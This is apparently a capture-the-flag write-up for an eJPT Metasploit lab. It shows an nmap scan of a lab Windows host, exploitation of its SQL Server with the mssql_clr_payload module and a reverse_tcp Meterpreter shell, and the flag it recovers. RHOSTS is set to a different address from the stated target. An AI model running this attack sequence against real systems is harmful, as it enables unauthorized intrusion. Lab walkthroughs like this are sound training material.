Welcome to the Metasploit Framework CTF 1 lab in the eJPT course. Let’s get into it!
Attacker IP: 10.10.48.12
Target IP: target.ine.local - 10.3.30.92
Let’s start off with an nmap scan. Below we see many ports are open but let’s focus on what the task is asking us. We want to look for an SQL server we can exploit. We see an open SQL service open on port 1433.
nmap -sV -sC 10.3.30.92
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2026-01-13 02:28 IST
Nmap scan report for target.ine.local (10.3.30.92)
Host is up (0.0031s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.6020.00; SP3
| ms-sql-ntlm-info:
| 10.3.30.92\\MSSQLSERVER:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
|_ Product_Version: 6.3.9600
| ms-sql-info:
| 10.3.30.92\\MSSQLSERVER:
| Instance name: MSSQLSERVER
| Version:
| name: Microsoft SQL Server 2012 SP3
| number: 11.00.6020.00
| Product: Microsoft SQL Server 2012
| Service pack level: SP3
| Post-SP patches applied: false
| TCP port: 1433
|_ Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-12T20:47:48
|_Not valid after: 2056-01-12T20:47:48
|_ssl-date: 2026-01-12T20:59:50+00:00; 0s from scanner time.
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=WIN-5BQ22OKH4SO
| Not valid before: 2026-01-11T20:47:49
|_Not valid after: 2026-07-13T20:47:49
|_ssl-date: 2026-01-12T20:59:50+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WIN-5BQ22OKH4SO
| NetBIOS_Domain_Name: WIN-5BQ22OKH4SO
| NetBIOS_Computer_Name: WIN-5BQ22OKH4SO
| DNS_Domain_Name: WIN-5BQ22OKH4SO
| DNS_Computer_Name: WIN-5BQ22OKH4SO
| Product_Version: 6.3.9600
|_ System_Time: 2026-01-12T20:59:42+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
We can use metasploit to gain a meterpreter session using the module below. Let’s start msfconsole and get our options ready.
service postgresql start && msfconsole -q
search mssql
use windows/mssql/mssql_clr_payload
options
setg RHOSTS 10.3.30.90
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
After gaining access with our meterpreter session we move to the root directory and find our first flag. We can cat the results from here and input the flag.
meterpreter > cd /
meterpreter > ls
Listing: C:\\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2021-12-15 09:58:20 +0530 $Recycle.Bin
100666/rw-rw-rw- 1 fil 2013-06-18 17:48:29 +0530 BOOTNXT
040777/rwxrwxrwx 0 dir 2013-08-22 20:18:41 +0530 Documents and Settings
040777/rwxrwxrwx 0 dir 2013-08-22 21:22:33 +0530 PerfLogs
040555/r-xr-xr-x 4096 dir 2025-01-09 12:30:38 +0530 Program Files
040777/rwxrwxrwx 4096 dir 2024-12-15 14:57:59 +0530 Program Files (x86)
040777/rwxrwxrwx 4096 dir 2015-08-13 21:42:59 +0530 ProgramData
040777/rwxrwxrwx 0 dir 2021-12-31 13:30:32 +0530 System Volume Information
040555/r-xr-xr-x 4096 dir 2025-01-09 12:42:28 +0530 Users
040777/rwxrwxrwx 24576 dir 2025-01-09 12:38:38 +0530 Windows
100444/r--r--r-- 398356 fil 2014-03-18 15:35:18 +0530 bootmgr
100666/rw-rw-rw- 34 fil 2026-01-13 02:18:09 +0530 flag1.txt
000000/--------- 0 fif 1970-01-01 05:30:00 +0530 pagefile.sys
meterpreter > cat flag1.txt
2f301bc8cdd949aca6ae3a6c5b43201c